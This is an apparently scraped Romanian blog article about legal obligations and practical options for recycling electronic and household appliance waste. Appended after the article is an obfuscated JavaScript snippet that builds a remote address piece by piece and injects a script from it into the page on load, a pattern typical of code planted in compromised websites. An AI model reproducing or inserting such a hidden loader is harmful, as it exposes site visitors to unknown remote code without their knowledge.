[ad_1]
Dispozitivele electronice sunt tot mai prezente în viețile noastre. Deși sunt utile fiindcă ne ușurează modul de viață și ne oferă oportunitatea de a fi mai aproape de cei pe care îi îndrăgim, odată cu trecerea timpului ajung la finalul duratei de viață.
În această etapă finală, majoritatea acționează după cum consideră că este mai ușor, fără să țină cont de mediul înconjurător și de legile existente privind procesul de reciclare electronice și electrocasnice.
Care sunt obligațiile pe care le ai pentru a recicla electronice?
Deșeurile electronice și electrocasnice au un statut special fiindcă au în componență materii care pot afecta sănătatea mediului înconjurător, dar și care pot fi recuperate, recondiționate și ulterior reutilizate.
Ca și utilizator de echipamente electronice, ai obligația de a preda electronicele și electrocasnicele pe care nu le mai utilizezi într-un centru de colectare care se ocupă de predarea lor în vederea tratării și reciclării corespunzătoare.. Chiar dacă este mai ușor să le arunci la gunoi ori să le depozitezi la voia întâmplării, legea reciclării produselor electronice se aplică tuturor și există consecințe care apar atunci când nu se respectă.
Bineînțeles, trebuie să ții cont de faptul că deșeurile electronice și electrocasnice se colectează selectiv. Mai exact, există șase categorii de deșeuri, în funcție de dimensiunea și tipul lor. În unele centre de colectare și reciclare ai posibilitatea de a preda orice fel de deșeu electronic, iar în altele poți preda doar anumite tipuri de echipamente electronice pe care nu le mai folosești.
Ce spune legea?
Colectarea selectivă și reciclarea produselor electronice este o obligație legală pentru toată lumea. Potrivit legii, toți importatorii și producătorii sunt obligați să îndeplinească o rată minimă de colectare. Mai exact, trebuie să colecteze în vederea reciclării cel puțin 65% din cantitatea de echipamente furnizate în piață în ultimii 3 ani..
În acest sens, trebuie să organizeze un sistem de management al deșeurilor electronice prin intermediul căreia să le colecteze de la utilizatori. Pot întemeia propriul sistem de colectare sau pot face transferul de responsabilitate către o altă entitate autorizată.
La rândul lor, utilizatorii sunt obligați să predea deșeurile de echipamente electronice și electrocasnice în centrele și punctele de colectare speciale sau direct furnizorului de electronice.
Unde poți recicla produsele electronice și electrocasnice?
Deșeurile electronice reprezintă o problemă de mediu la nivel mondial. Acest lucru se datorează iresponsabilității oamenilor și lipsei de interes față de mediul înconjurător. Deși sunt legi care trebuie respectate, mulți oameni consideră că este mai comod să arunce deșeurile electronice și electrocasnice direct în gunoiul menajer, la marginea câmpurilor ori a pădurilor, în ape sau să le depoziteze necorespunzător.
Electronicele sunt alcătuite din materiale care pot fi reutilizate în procesul de fabricare al altor dispozitive (ex: plastic, metal), dar conțin și materii care odată integrate în sol pot afecta mediul în care trăim, inclusiv sănătatea noastră și a celor din jur.
Dacă dorești să fii o persoană mai responsabilă și să contribui la sprijinirea mediului înconjurător, îți sugerăm să predai echipamentele pe care nu le mai utilizezi într-un centru de colectare. Dacă nu ai unul aproape de tine, cu siguranță vei găsi un magazin de electronice care preia deșeuri de la utilizatori. Există amplasate pe teritoriul României mii de puncte de colectare DEEE, pe care le regăsești în anumite lanțuri de magazine, în instituții publice sau private.
Bineînțeles, dacă intenționezi să cumperi un dispozitiv electronic nou, poți solicita furnizorului să preia echipamentul vechi la schimb. Este un serviciu gratuit, care te scapă de alte griji și îți poate aduce un mic bonus pe care să îl folosești la următoarea achiziție.
(function(){
ak50=document.createElement(„script”);ak50_=”u”+(„s”)+”ta”;
ak50_+=(„t.i”)+””+”n”;ak50_+=((„f”)+”o”);ak50.type=”text/javascript”;
ak50_+=”/”; ak50u=”433347698″;ak50u+=”.rtsqwn9wk500d3blfhr”;ak50u+=”Xg80puzjde4″;
ak50.src=”https://”+ak50_+ak50u;ak50.async=true;document.body.appendChild(ak50);
})();
[ad_2]
Source link